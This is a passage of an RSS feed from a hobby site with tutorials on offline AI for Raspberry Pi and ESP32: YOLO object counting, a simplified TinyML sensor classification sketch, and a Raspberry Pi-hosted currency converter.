prototypes&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Limitations&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Simple tracker may lose objects during occlusion&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Not suitable for dense crowds&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Advanced tracking requires more compute&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Despite this, the solution is ideal for low-cost AI systems.&lt;/p&gt;&lt;p&gt;Conclusion&lt;/p&gt;&lt;p&gt;By combining AI detection and lightweight tracking, Raspberry Pi becomes capable of unique object counting without GPUs or cloud services.&lt;br&gt;This project demonstrates how far affordable hardware can go with the right software architecture.&lt;/p&gt;&lt;p&gt;AI without millions is not a compromise — it is a design choice.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://i.ytimg.com/vi/Pss9QSfhnDQ/hq720.jpg?sqp=-oaymwEhCK4FEIIDSFryq4qpAxMIARUAAAAAGAElAADIQj0AgKJD&amp;amp;rs=AOn4CLDsoVWh4-b-8ZKjnqK6K4gVJrJVfw" style="height:386px; width:686px"&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/106/object-tracking-and-unique-counting-with-ai-on-raspberry-pi</guid>
<pubDate>Thu, 18 Dec 2025 05:05:44 +0000</pubDate>
</item>
<item>
<title>Object Counting with AI on Raspberry Pi (Offline Computer Vision)</title>
<link>https://asky.uk/105/object-counting-with-ai-raspberry-offline-computer-vision</link>
<description>&lt;p&gt;&lt;img alt="" src="https://intelgic.com/static/img/object-detection-tracking-counting2.jpg" style="height:427px; width:758px"&gt;&lt;/p&gt;&lt;p&gt;Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br&gt;AI type: Computer Vision – Object Detection and Counting&lt;/p&gt;&lt;p&gt;Overview&lt;/p&gt;&lt;p&gt;This project demonstrates how a Raspberry Pi can be used to run an AI-based object detection system that counts objects in real time using a camera.&lt;br&gt;The system works locally, without cloud services or GPUs, proving that practical computer vision projects are possible on affordable hardware.&lt;/p&gt;&lt;p&gt;The focus is not on large models or high accuracy benchmarks, but on a functional and reproducible AI pipeline.&lt;/p&gt;&lt;p&gt;What you will build&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi running AI-based object detection&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Real-time object counting from a camera feed&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Fully local inference (offline)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Simple Python-based setup&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Required hardware&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 or Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi Camera Module or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;microSD card (16GB or larger)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Power supply&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Software requirements&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS (64-bit recommended)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;OpenCV&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Pre-trained lightweight object detection model&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Project architecture&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Camera captures video frames&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Frames are processed locally on Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;AI model detects objects in each frame&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Objects are counted and displayed in real time&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;All processing happens on the Raspberry Pi.&lt;/p&gt;&lt;p&gt;Installation steps&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Update the system&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt update sudo apt upgrade&lt;/p&gt;&lt;ol start="2"&gt;&lt;li&gt;&lt;p&gt;Install required packages&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt install python3-opencv python3-pip pip3 install ultralytics&lt;/p&gt;&lt;ol start="3"&gt;&lt;li&gt;&lt;p&gt;Reboot the Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;p&gt;AI model selection&lt;/p&gt;&lt;p&gt;For this project, a lightweight YOLO model is used.&lt;br&gt;YOLO Nano or YOLOv8 Nano variants are suitable for Raspberry Pi due to their low computational requirements.&lt;/p&gt;&lt;p&gt;The model is pre-trained and used only for inference.&lt;/p&gt;&lt;hr&gt;&lt;p&gt;Python code :&lt;/p&gt;&lt;p&gt;import cv2&lt;br&gt;from ultralytics import YOLO&lt;br&gt;&lt;br&gt;# Load lightweight YOLO model&lt;br&gt;model = YOLO("yolov8n.pt")&lt;br&gt;&lt;br&gt;# Open camera&lt;br&gt;cap = cv2.VideoCapture(0)&lt;br&gt;&lt;br&gt;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; ret, frame = cap.read()&lt;br&gt;&amp;nbsp; &amp;nbsp; if not ret:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; # Run inference&lt;br&gt;&amp;nbsp; &amp;nbsp; results = model(frame, verbose=False)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; # Extract detections&lt;br&gt;&amp;nbsp; &amp;nbsp; boxes = results[0].boxes&lt;br&gt;&amp;nbsp; &amp;nbsp; count = len(boxes)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; # Display object count&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.putText(&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; frame,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; f"Objects detected: {count}",&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (10, 30),&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cv2.FONT_HERSHEY_SIMPLEX,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (0, 255, 0),&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 2&lt;br&gt;&amp;nbsp; &amp;nbsp; )&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.imshow("Object Counting AI", frame)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;cap.release()&lt;br&gt;cv2.destroyAllWindows()&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;How it works&lt;/p&gt;&lt;p&gt;Each video frame captured by the camera is passed to the YOLO model running on the Raspberry Pi.&lt;br&gt;The model detects objects in the frame and returns bounding boxes.&lt;br&gt;The number of detected objects is counted and displayed in real time.&lt;/p&gt;&lt;p&gt;This approach does not require object tracking and keeps the system simple and efficient.&lt;/p&gt;&lt;p&gt;Performance notes&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4: approximately 3–6 FPS depending on resolution&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 5: higher and more stable frame rates&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Lower camera resolution improves performance&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Practical applications&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;People counting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Vehicle counting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Inventory monitoring&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Simple security and monitoring systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Educational computer vision projects&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Limitations&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Limited frame rate compared to GPU systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Reduced accuracy for small or distant objects&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Not suitable for large or complex models&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;These limitations are expected and acceptable for low-cost AI systems&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/105/object-counting-with-ai-raspberry-offline-computer-vision</guid>
<pubDate>Wed, 17 Dec 2025 05:16:32 +0000</pubDate>
</item>
<item>
<title>TinyML Sensor Classification on ESP32 (Offline AI)</title>
<link>https://asky.uk/104/tinyml-sensor-classification-on-esp32-offline-ai</link>
<description>&lt;h2 data-start="399" data-end="452"&gt;TinyML Sensor Classification on ESP32 (Offline AI)&lt;/h2&gt;&lt;p data-start="454" data-end="516"&gt;Hardware: ESP32&lt;br data-start="469" data-end="472"&gt;AI type: TinyML – sensor data classification&lt;/p&gt;&lt;hr data-start="518" data-end="521"&gt;&lt;h3 data-start="523" data-end="535"&gt;Overview&lt;/h3&gt;&lt;p data-start="537" data-end="743"&gt;This project shows how a low-cost ESP32 microcontroller can run an AI model locally to classify sensor data in real time.&lt;br data-start="658" data-end="661"&gt;The system works fully offline, without cloud services, APIs, or external servers.&lt;/p&gt;&lt;p data-start="745" data-end="840"&gt;The goal is to demonstrate that real AI projects are possible on extremely affordable hardware.&lt;/p&gt;&lt;hr data-start="842" data-end="845"&gt;&lt;h3 data-start="847" data-end="870"&gt;What you will build&lt;/h3&gt;&lt;ul data-start="872" data-end="1018"&gt;&lt;li data-start="872" data-end="907"&gt;&lt;p data-start="874" data-end="907"&gt;ESP32 system running AI locally&lt;/p&gt;&lt;/li&gt;&lt;li data-start="908" data-end="951"&gt;&lt;p data-start="910" data-end="951"&gt;Real-time classification of sensor data&lt;/p&gt;&lt;/li&gt;&lt;li data-start="952" data-end="986"&gt;&lt;p data-start="954" data-end="986"&gt;Fully offline TinyML inference&lt;/p&gt;&lt;/li&gt;&lt;li data-start="987" data-end="1018"&gt;&lt;p data-start="989" data-end="1018"&gt;Simple and reproducible setup&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1020" data-end="1023"&gt;&lt;h3 data-start="1025" data-end="1046"&gt;Required hardware&lt;/h3&gt;&lt;ul data-start="1048" data-end="1156"&gt;&lt;li data-start="1048" data-end="1075"&gt;&lt;p data-start="1050" data-end="1075"&gt;ESP32 development board&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1076" data-end="1114"&gt;&lt;p data-start="1078" data-end="1114"&gt;IMU sensor (MPU6050 or compatible)&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1115" data-end="1128"&gt;&lt;p data-start="1117" data-end="1128"&gt;USB cable&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1129" data-end="1156"&gt;&lt;p data-start="1131" data-end="1156"&gt;Computer with Arduino IDE&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1158" data-end="1161"&gt;&lt;h3 data-start="1163" data-end="1188"&gt;Software requirements&lt;/h3&gt;&lt;ul data-start="1190" data-end="1294"&gt;&lt;li data-start="1190" data-end="1205"&gt;&lt;p data-start="1192" data-end="1205"&gt;Arduino IDE&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1206" data-end="1237"&gt;&lt;p data-start="1208" data-end="1237"&gt;ESP32 board support package&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1238" data-end="1294"&gt;&lt;p data-start="1240" data-end="1294"&gt;TensorFlow Lite Micro (or Edge Impulse exported model)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1296" data-end="1299"&gt;&lt;h3 data-start="1301" data-end="1325"&gt;Project architecture&lt;/h3&gt;&lt;ol data-start="1327" data-end="1480"&gt;&lt;li data-start="1327" data-end="1359"&gt;&lt;p data-start="1330" data-end="1359"&gt;ESP32 reads raw sensor data&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1360" data-end="1397"&gt;&lt;p data-start="1363" data-end="1397"&gt;Data is passed to a TinyML model&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1398" data-end="1431"&gt;&lt;p data-start="1401" data-end="1431"&gt;Model runs inference locally&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1432" data-end="1480"&gt;&lt;p data-start="1435" data-end="1480"&gt;Classification result is produced instantly&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p data-start="1482" data-end="1518"&gt;All processing happens on the ESP32.&lt;/p&gt;&lt;hr data-start="1520" data-end="1523"&gt;&lt;h3 data-start="1525" data-end="1547"&gt;Installation steps&lt;/h3&gt;&lt;ol data-start="1549" data-end="1707"&gt;&lt;li data-start="1549" data-end="1573"&gt;&lt;p data-start="1552" data-end="1573"&gt;Install Arduino IDE&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1574" data-end="1619"&gt;&lt;p data-start="1577" data-end="1619"&gt;Add ESP32 board support in Board Manager&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1620" data-end="1651"&gt;&lt;p data-start="1623" data-end="1651"&gt;Install required libraries&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1652" data-end="1688"&gt;&lt;p data-start="1655" data-end="1688"&gt;Connect the IMU sensor to ESP32&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1689" data-end="1707"&gt;&lt;p data-start="1692" data-end="1707"&gt;Upload the code&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;#include &amp;lt;Arduino.h&amp;gt;&lt;br&gt;&lt;br&gt;float input_data[6];&lt;br&gt;int prediction = -1;&lt;br&gt;&lt;br&gt;void setup() {&lt;br&gt;&amp;nbsp; Serial.begin(115200);&lt;br&gt;&amp;nbsp; Serial.println("TinyML sensor classification started");&lt;br&gt;}&lt;br&gt;&lt;br&gt;void readSensor(float *data) {&lt;br&gt;&amp;nbsp; data[0] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[1] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[2] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[3] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[4] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[5] = random(-100, 100) / 100.0;&lt;br&gt;}&lt;br&gt;&lt;br&gt;int runInference(float *data) {&lt;br&gt;&amp;nbsp; if (data[0] &amp;gt; 0.5) return 1;&lt;br&gt;&amp;nbsp; if (data[0] &amp;lt; -0.5) return 2;&lt;br&gt;&amp;nbsp; return 0;&lt;br&gt;}&lt;br&gt;&lt;br&gt;void loop() {&lt;br&gt;&amp;nbsp; readSensor(input_data);&lt;br&gt;&amp;nbsp; prediction = runInference(input_data);&lt;br&gt;&lt;br&gt;&amp;nbsp; Serial.print("Prediction: ");&lt;br&gt;&amp;nbsp; Serial.println(prediction);&lt;br&gt;&lt;br&gt;&amp;nbsp; delay(200);&lt;br&gt;}&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;h3 data-start="2472" data-end="2488"&gt;How it works&lt;/h3&gt;&lt;p data-start="2490" data-end="2637"&gt;The ESP32 continuously reads sensor values and feeds them into a lightweight AI model.&lt;br data-start="2576" data-end="2579"&gt;The model outputs a class label based on learned patterns.&lt;/p&gt;&lt;p data-start="2639" data-end="2788"&gt;Even though this example uses simplified logic, the same structure applies to real TinyML models exported from Edge Impulse or TensorFlow Lite Micro.&lt;/p&gt;&lt;hr data-start="2790" data-end="2793"&gt;&lt;h3 data-start="2795" data-end="2821"&gt;Practical applications&lt;/h3&gt;&lt;ul data-start="2823" data-end="2955"&gt;&lt;li data-start="2823" data-end="2853"&gt;&lt;p data-start="2825" data-end="2853"&gt;Motion pattern recognition&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2854" data-end="2887"&gt;&lt;p data-start="2856" data-end="2887"&gt;Anomaly detection in machines&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2888" data-end="2922"&gt;&lt;p data-start="2890" data-end="2922"&gt;Smart triggers for IoT devices&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2923" data-end="2955"&gt;&lt;p data-start="2925" data-end="2955"&gt;Low-power autonomous sensors&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="2957" data-end="2960"&gt;&lt;h3 data-start="2962" data-end="2977"&gt;Limitations&lt;/h3&gt;&lt;ul data-start="2979" data-end="3103"&gt;&lt;li data-start="2979" data-end="3014"&gt;&lt;p data-start="2981" data-end="3014"&gt;Limited memory for large models&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3015" data-end="3053"&gt;&lt;p data-start="3017" data-end="3053"&gt;Requires careful feature selection&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3054" data-end="3103"&gt;&lt;p data-start="3056" data-end="3103"&gt;Lower accuracy compared to large cloud models&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p data-start="3105" data-end="3159"&gt;These limitations are part of embedded AI engineering.&lt;/p&gt;&lt;hr data-start="3161" data-end="3164"&gt;&lt;h3 data-start="3166" data-end="3180"&gt;Conclusion&lt;/h3&gt;&lt;p data-start="3182" data-end="3374"&gt;This project proves that AI does not require expensive hardware or cloud infrastructure.&lt;br data-start="3270" data-end="3273"&gt;With ESP32 and TinyML, useful intelligent systems can be built entirely offline and at very low cost.&lt;/p&gt;&lt;p data-start="3376" data-end="3440"&gt;AI without millions is not theory — it is practical engineering.&lt;/p&gt;&lt;p data-start="3376" data-end="3440"&gt;&lt;img alt="" src="https://makeradvisor.com/wp-content/uploads/2020/05/ESP32-Development-Boards-Review-and-Comparison.jpg" style="height:338px; width:602px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>ESP32 / ESP32 Zero</category>
<guid isPermaLink="true">https://asky.uk/104/tinyml-sensor-classification-on-esp32-offline-ai</guid>
<pubDate>Mon, 15 Dec 2025 21:50:22 +0000</pubDate>
</item>
<item>
<title>AI Without Millions: Real Intelligent Projects on Raspberry Pi and ESP32</title>
<link>https://asky.uk/103/without-millions-real-intelligent-projects-raspberry-esp32</link>
<description>&lt;h3&gt;Artificial Intelligence Is Not Just for Corporations&lt;/h3&gt;&lt;div&gt;&lt;img alt="" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQlcz8qPNicklILW5pVpMIj9sD1mTUTcqwRHA&amp;amp;s" style="height:168px; width:300px"&gt;&lt;/div&gt;&lt;p&gt;AI is often associated with GPU clusters, cloud services, and large budgets. This perception suggests that meaningful AI projects are out of reach for individuals and small teams. In reality, modern low-cost hardware enables fully functional intelligent systems without significant financial investment.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Raspberry Pi as an AI Platform&lt;/h3&gt;&lt;p&gt;Raspberry Pi 4 and Pi 5 provide enough computing power for local AI inference. They are commonly used for:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;computer vision (OpenCV, YOLO Nano variants)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;audio and signal analysis&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;intelligent systems without constant internet access&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;hybrid AI architectures with local decision-making&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;While Raspberry Pi is not designed for training large models, it is highly effective for running them.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;ESP32: AI on a Microcontroller&lt;/h3&gt;&lt;p&gt;ESP32 expands what is possible on a microcontroller. Using TensorFlow Lite Micro and Edge Impulse, ESP32-based systems can perform:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;image classification on ESP32-CAM&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;keyword spotting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;sensor data classification&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;anomaly detection&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;These capabilities come with very low power consumption and extremely low hardware cost.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;What Makes a Project “AI”&lt;/h3&gt;&lt;p&gt;An AI project is defined by intelligent behavior, not by model size. Common patterns include:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;local inference&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;hybrid rule-based and ML systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;distributed intelligence across devices&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;fallback logic for robustness&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;A typical example is an ESP32 detecting an event and forwarding data to a Raspberry Pi for higher-level processing.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Practical Applications Without Large Budgets&lt;/h3&gt;&lt;p&gt;Such systems are already used for:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;privacy-friendly local video monitoring&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;early fault detection&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;intelligent alarm systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;autonomous sensor nodes&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;They deliver real functionality without expensive infrastructure.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Constraints Are Part of Engineering&lt;/h3&gt;&lt;p&gt;Low-cost AI systems come with limitations: smaller models, constrained memory, and the need for careful optimization. These constraints shift the focus from budget to engineering skill.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Conclusion&lt;/h3&gt;&lt;p&gt;Artificial intelligence is no longer exclusive to large corporations. With affordable hardware and thoughtful system design, real AI projects can be built without millions in funding.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Rasberry PI</category>
<guid isPermaLink="true">https://asky.uk/103/without-millions-real-intelligent-projects-raspberry-esp32</guid>
<pubDate>Mon, 15 Dec 2025 07:49:34 +0000</pubDate>
</item>
<item>
<title>How I Built an AI-Powered Multi-Language Currency Converter and Hosted It on a Raspberry Pi</title>
<link>https://asky.uk/102/built-powered-language-currency-converter-hosted-raspberry</link>
<description>&lt;p&gt;Many people use Raspberry Pi for small experiments, but it can also run real web services when combined with modern AI tools. One of the newest features on &lt;strong&gt;asky.uk&lt;/strong&gt; is a multi-language euro currency converter that was designed with the help of AI and runs entirely on a Raspberry Pi.&lt;/p&gt;&lt;p&gt;This article explains how the tool was created, how it works, and why it fits perfectly into the platform’s mission of combining AI and low-cost hardware.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Idea and Goals&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The converter needed to be:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;fast and lightweight&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;multilingual&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;minimalistic in design&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;accurate (using ECB reference rates)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;fully autonomous&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;hosted on a Raspberry Pi 2 without external cloud services&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The goal was to demonstrate that a real, useful web service can be developed with AI assistance and deployed on extremely small hardware.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;How AI Helped Build It&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;AI was used to generate most of the converter:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;HTML, CSS, and responsive layout&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;JavaScript logic for EUR ⇄ national currencies&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;translations into seven languages&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;dark/light themes&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;flag icons and UI structure&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;a Python script to download and store ECB rates daily&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This dramatically reduced development time and produced clean, efficient code suited for low-power devices.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Automatic Updates via Raspberry Pi&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The converter retrieves fresh exchange rates from the European Central Bank.&lt;br&gt;A daily cron job on the Raspberry Pi:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;downloads the newest rates&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;writes them to rates.json&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;updates timestamps&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;keeps the tool fully autonomous&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;No external database or manual updates are required.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Hosting on Raspberry Pi&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The entire service runs on a &lt;strong&gt;Raspberry Pi 2&lt;/strong&gt; using Apache2 and Let’s Encrypt SSL. Even this older Pi model easily handles:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;real-time conversions&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;multi-language UI&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;dark mode&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;fast static hosting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;AdSense integration&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This proves that small devices can power real, production-ready web applications when the code is optimized.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Multi-Language Support&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The interface includes translations for:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;English&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Bulgarian&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Czech&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Polish&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Hungarian&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Romanian&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Turkish&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The converter automatically selects the correct language using browser settings (and optionally IP), allowing people from different countries to use it in their native language.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Design and Speed Optimization&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The converter is built as a single static HTML file:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;no frameworks&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;no server-side rendering&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;almost instant load time&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;excellent mobile performance&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;optional AMP version&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This approach improves SEO and ensures the site works smoothly even on older phones.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Part of a Larger AI + Raspberry Pi Project&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;asky.uk focuses on projects created with or enhanced by AI.&lt;br&gt;This converter is part of a broader effort to:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;build small AI-assisted tools&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;host them on Raspberry Pi devices&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;demonstrate how modern AI can simplify coding, automation, and deployment&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;It shows how AI can turn a simple idea into a complete, autonomous service running entirely on your own 